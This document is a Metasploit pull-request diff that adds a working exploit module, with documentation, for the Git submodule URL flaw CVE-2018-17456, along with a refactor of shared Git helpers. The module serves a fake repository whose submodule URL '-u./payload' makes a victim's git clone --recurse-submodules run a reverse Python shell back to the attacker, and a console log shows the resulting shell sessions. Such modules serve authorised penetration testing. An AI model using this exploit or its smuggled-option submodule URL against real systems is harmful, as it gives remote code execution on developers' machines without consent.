Land #10828, git submodule url exec CVE-2018-17456

documentation/modules/exploit/multi/http/git_submodule_url_exec.md

@@ -0,0 +1,87 @@
+## Description
+
+  This module exploits CVE-2018-17456, which affects Git versions 2.14.5, 2.15.3, 2.16.5, 2.17.2, 2.18.1, and 2.19.1 and lower.  
+
+  When a submodule url which starts with a dash e.g "-u./payload" is passed as an argument to git clone, the file "payload" inside the repository is executed.
+
+  This module creates a fake git repository which contains a submodule containing the vulnerability. The vulnerability is triggered when the submodules are initialised (e.g git clone --recurse-submodules URL)
+
+## Vulnerable Application
+
+  Git can be installed on a variety of operating systems, however
+  newer versions will contain the patch for this vulnerability.
+
+  On OSX it can be installed with the XCode command line tools:
+  `xcode-select --install`
+  
+  On Linux it can be installed with apt:
+  `sudo apt-get update && sudo apt-get install git`
+
+  You can check the version with `git --version`.
+  The fix is included in the following version:
+    2.7.6, 2.8.6, 2.9.5, 2.10.4, 2.11.3, 2.12.4, 2.13.5, 2.14.1
+
+## Verification Steps
+
+  Example steps in this format:
+
+  1. Install the application
+  1. Start msfconsole
+  1. Do: `use exploit/multi/http/git_submodule_url_exec`
+  1. Do: `set LHOST [local host]`
+  1. Do: `exploit`
+  1. Clone the malicious Git URI and its submodules (e.g `git clone --recurse-submodules GIT_URL`)
+  1. You should get a shell
+
+## Options
+
+  **GIT_URI**
+
+  This is the URI the git repository will be hosted from (defaults to random).
+
+  **GIT_SUBMODULE**
+
+  This is the URI of the submodule within the git repository (defaults to random).
+  The url of this submodule, when cloned, will execute the payload.
+
+## Scenarios
+
+
+```
+msf5 > use exploit/multi/http/git_submodule_url_exec
+msf5 exploit(multi/http/git_submodule_url_exec) > set LHOST 192.168.0.1
+LHOST => 192.168.0.1
+msf5 exploit(multi/http/git_submodule_url_exec) > exploit
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 192.168.0.1:4444
+msf5 exploit(multi/http/git_submodule_url_exec) > [*] Using URL: http://0.0.0.0:8080/yaDlXuHVnRMMYGQ
+[*] Local IP: http://192.168.0.1:8080/yaDlXuHVnRMMYGQ
+[*] Server started.
+[*] Malicious Git URI is http://192.168.0.1:8080/ogkvs.git
+[*] Command shell session 1 opened (192.168.0.1:4444 -> 192.168.0.1:41034) at 2018-10-18 12:41:40 +0000
+[*] Command shell session 2 opened (192.168.0.1:4444 -> 192.168.0.1:41036) at 2018-10-18 12:41:41 +0000
+```
+
+On the victim side:
+
+```
+git clone --recurse-submodules http://192.168.0.1:8080/ogkvs.git
+Cloning into 'ogkvs'...
+Submodule 'lfr:lr' (-u./rDwoZ) registered for path 'lfr:lr'
+Cloning into 'lr'...
+fatal: Could not read from remote repository.
+
+Please make sure you have the correct access rights
+and the repository exists.
+fatal: clone of '-u./rDwoZ' into submodule path 'ogkvs/lfr:lr' failed
+Failed to clone 'lfr:lr'. Retry scheduled
+Cloning into 'lr'...
+fatal: Could not read from remote repository.
+
+Please make sure you have the correct access rights
+and the repository exists.
+fatal: clone of '-u./rDwoZ' into submodule path 'ogkvs/lfr:lr' failed
+Failed to clone 'lfr:lr' a second time, aborting
+```

lib/msf/core/exploit/git.rb

@@ -0,0 +1,38 @@
+# -*- coding: binary -*-
+
+module Msf
+
+# This mixin provides helper functions for building Git repositories
+module Exploit::Git
+
+  # Generate a commit message using fake names and emails
+  def fake_commit_message
+    email = Rex::Text.rand_mail_address
+    first, last, company = email.scan(/([^\.]+)\.([^\.]+)@(.*)$/).flatten
+    full_name = "#{first.capitalize} #{last.capitalize}"
+    tstamp = Time.now.to_i
+    author_time = rand(tstamp)
+    commit_time = rand(author_time)
+    tz_off = rand(10)
+    commit = "author #{full_name} <#{email}> #{author_time} -0#{tz_off}00\n" \
+             "committer #{full_name} <#{email}> #{commit_time} -0#{tz_off}00\n" \
+             "\n" \
+             "Initial commit to open git repository for #{company}!\n"
+    commit
+  end
+
+  # Build's a Git object
+  def build_object(type, content)
+    # taken from http://schacon.github.io/gitbook/7_how_git_stores_objects.html
+    header = "#{type} #{content.size}\0"
+    store = header + content
+    [Digest::SHA1.hexdigest(store), Zlib::Deflate.deflate(store)]
+  end
+
+  # Returns the Git object path name that a file with the provided SHA1 will reside in
+  def get_path(sha1)
+    sha1[0...2] + '/' + sha1[2..40]
+  end
+
+end
+end

lib/msf/core/exploit/mixins.rb

@@ -68,6 +68,7 @@ require 'msf/core/exploit/afp'
 require 'msf/core/exploit/realport'
 require 'msf/core/exploit/sip'
 require 'msf/core/exploit/tincd'
+require 'msf/core/exploit/git'
 
 # Telephony
 require 'msf/core/exploit/dialup'

modules/exploits/multi/http/git_client_command_exec.rb

@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::Git
   include Msf::Exploit::Powershell
 
   def initialize(info = {})
@@ -181,23 +182,12 @@ class MetasploitModule < Msf::Exploit::Remote
     git_dir = '.' + variants.sample
     sha1, content = build_object('tree', "40000 #{git_dir}\0#{[sha1].pack('H*')}")
     @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
-    # build the supposed commit that dropped this file, which has a random user/company
-    email = Rex::Text.rand_mail_address
-    first, last, company = email.scan(/([^\.]+)\.([^\.]+)@(.*)$/).flatten
-    full_name = "#{first.capitalize} #{last.capitalize}"
-    tstamp = Time.now.to_i
-    author_time = rand(tstamp)
-    commit_time = rand(author_time)
-    tz_off = rand(10)
-    commit = "author #{full_name} <#{email}> #{author_time} -0#{tz_off}00\n" \
-             "committer #{full_name} <#{email}> #{commit_time} -0#{tz_off}00\n" \
-             "\n" \
-             "Initial commit to open git repository for #{company}!\n"
+
     if datastore['VERBOSE']
       vprint_status("Malicious Git commit of #{git_dir}/#{datastore['GIT_HOOK']} is:")
       commit.each_line { |l| vprint_status(l.strip) }
     end
-    sha1, content = build_object('commit', "tree #{sha1}\n#{commit}")
+    sha1, content = build_object('commit', "tree #{sha1}\n#{fake_commit_message}")
     @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
     # build HEAD
     @repo_data[:git][:files]['/HEAD'] = "ref: refs/heads/master\n"
@@ -229,19 +219,6 @@ class MetasploitModule < Msf::Exploit::Remote
     # TODO: finish building the fake repository
   end
 
-  # Build's a Git object
-  def build_object(type, content)
-    # taken from http://schacon.github.io/gitbook/7_how_git_stores_objects.html
-    header = "#{type} #{content.size}\0"
-    store = header + content
-    [Digest::SHA1.hexdigest(store), Zlib::Deflate.deflate(store)]
-  end
-
-  # Returns the Git object path name that a file with the provided SHA1 will reside in
-  def get_path(sha1)
-    sha1[0...2] + '/' + sha1[2..40]
-  end
-
   def exploit
     super
   end

modules/exploits/multi/http/git_submodule_command_exec.rb

@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::Git
 
   def initialize(info = {})
     super(
@@ -97,38 +98,12 @@ url = ssh://-oProxyCommand=#{payload_cmd}/
     sha1, content = build_object('tree', tree)
     @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
 
-    ## build the supposed commit that dropped this file, which has a random user/company
-    email = Rex::Text.rand_mail_address
-    first, last, company = email.scan(/([^\.]+)\.([^\.]+)@(.*)$/).flatten
-    full_name = "#{first.capitalize} #{last.capitalize}"
-    tstamp = Time.now.to_i
-    author_time = rand(tstamp)
-    commit_time = rand(author_time)
-    tz_off = rand(10)
-    commit = "author #{full_name} <#{email}> #{author_time} -0#{tz_off}00\n" \
-             "committer #{full_name} <#{email}> #{commit_time} -0#{tz_off}00\n" \
-             "\n" \
-             "Initial commit to open git repository for #{company}!\n"
-
-    sha1, content = build_object('commit', "tree #{sha1}\n#{commit}")
+    sha1, content = build_object('commit', "tree #{sha1}\n#{fake_commit_message}")
     @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
     @repo_data[:git][:files]['/HEAD'] = "ref: refs/heads/master\n"
     @repo_data[:git][:files]['/info/refs'] = "#{sha1}\trefs/heads/master\n"
   end
 
-  # Build's a Git object
-  def build_object(type, content)
-    # taken from http://schacon.github.io/gitbook/7_how_git_stores_objects.html
-    header = "#{type} #{content.size}\0"
-    store = header + content
-    [Digest::SHA1.hexdigest(store), Zlib::Deflate.deflate(store)]
-  end
-
-  # Returns the Git object path name that a file with the provided SHA1 will reside in
-  def get_path(sha1)
-    sha1[0...2] + '/' + sha1[2..40]
-  end
-
   def exploit
     super
   end

modules/exploits/multi/http/git_submodule_url_exec.rb

@@ -0,0 +1,136 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::Git
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Malicious Git HTTP Server For CVE-2018-17456',
+        'Description' => %q(
+                  This module exploits CVE-2018-17456, which affects Git
+          versions 2.14.5, 2.15.3, 2.16.5, 2.17.2, 2.18.1, and 2.19.1 and lower.
+
+          When a submodule url which starts with a dash e.g "-u./payload" is passed
+          as an argument to git clone, the file "payload" inside the repository
+          is executed.
+
+          This module creates a fake git repository which contains a submodule
+          containing the vulnerability. The vulnerability is triggered when the
+          submodules are initialised (e.g git clone --recurse-submodules URL)
+        ),
+        'License' => MSF_LICENSE,
+        'References'     =>
+          [
+            ['CVE', '2018-17456'],
+            ['URL', 'https://marc.info/?l=git&m=153875888916397&w=2' ],
+            ['URL', 'https://gist.github.com/joernchen/38dd6400199a542bc9660ea563dcf2b6' ],
+            ['URL', 'https://blog.github.com/2018-10-05-git-submodule-vulnerability' ],
+          ],
+        'DisclosureDate' => 'Oct 05 2018',
+        'Targets' => [
+          ['Automatic',
+            {
+              'Platform' => [ 'unix' ],
+              'Arch' => ARCH_CMD,
+              'Payload' => {'Compat' => {'PayloadType' => 'python'}}
+            }
+          ]
+        ],
+        'DefaultOptions' => {'Payload' => 'cmd/unix/reverse_python'},
+        'DefaultTarget'  => 0
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty for random)', '']),
+        OptString.new('GIT_SUBMODULE', [false, 'The path to use as the malicious git submodule (empty for random)', ''])
+      ]
+    )
+  end
+
+  def setup
+    @repo_data = {
+      git: { files: {} }
+    }
+    setup_git
+    super
+  end
+
+  def setup_git
+    # URI must start with a /
+    unless git_uri && git_uri.start_with?('/')
+      fail_with(Failure::BadConfig, 'GIT_URI must start with a /')
+    end
+
+    payload_content = "#!/bin/sh\n#{payload.raw} &"
+    payload_file = Rex::Text.rand_text_alpha(4..6)
+
+    submodule_path = datastore['GIT_SUBMODULE']
+    if submodule_path.blank?
+      submodule_path = Rex::Text.rand_text_alpha(2..6).downcase + ":" + Rex::Text.rand_text_alpha(2..6).downcase
+    end
+    unless submodule_path.include?":"
+      fail_with(Failure::BadConfig, 'GIT_SUBMODULE must contain a :')
+    end
+
+    gitmodules = "[submodule \"#{submodule_path}\"]
+path = #{submodule_path}
+url = -u./#{payload_file}
+"
+
+    sha1, content = build_object('blob', gitmodules)
+    @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
+    payloadsha1, content = build_object('blob', payload_content)
+    @repo_data[:git][:files]["/objects/#{get_path(payloadsha1)}"] = content
+
+    tree = "100644 .gitmodules\0#{[sha1].pack('H*')}"
+    tree += "100744 #{payload_file}\0#{[payloadsha1].pack('H*')}"
+    tree += "160000 #{submodule_path}\0#{[sha1].pack('H*')}"
+    sha1, content = build_object('tree', tree)
+    @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
+
+    sha1, content = build_object('commit', "tree #{sha1}\n#{fake_commit_message}")
+    @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
+    @repo_data[:git][:files]['/HEAD'] = "ref: refs/heads/master\n"
+    @repo_data[:git][:files]['/info/refs'] = "#{sha1}\trefs/heads/master\n"
+  end
+
+  def primer
+    # add the git and mercurial URIs as necessary
+    hardcoded_uripath(git_uri)
+    git_url = URI.parse(get_uri).merge(git_uri)
+    print_status("Malicious Git URI is #{git_url}")
+    print_status("git clone --recurse-submodules #{git_url}")
+  end
+
+  # handles git clone
+  def on_request_uri(cli, req)
+    req_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '')
+    if @repo_data[:git][:files].key?(req_file)
+      vprint_status("Sending Git #{req_file}")
+      send_response(cli, @repo_data[:git][:files][req_file])
+    else
+      vprint_status("Git #{req_file} doesn't exist")
+      send_not_found(cli)
+    end
+  end
+
+  # Returns the value of GIT_URI if not blank, otherwise returns a random .git URI
+  def git_uri
+    return @git_uri if @git_uri
+    if datastore['GIT_URI'].blank?
+      @git_uri = '/' + Rex::Text.rand_text_alpha(4..6).downcase + '.git'
+    else
+      @git_uri = datastore['GIT_URI']
+    end
+  end
+end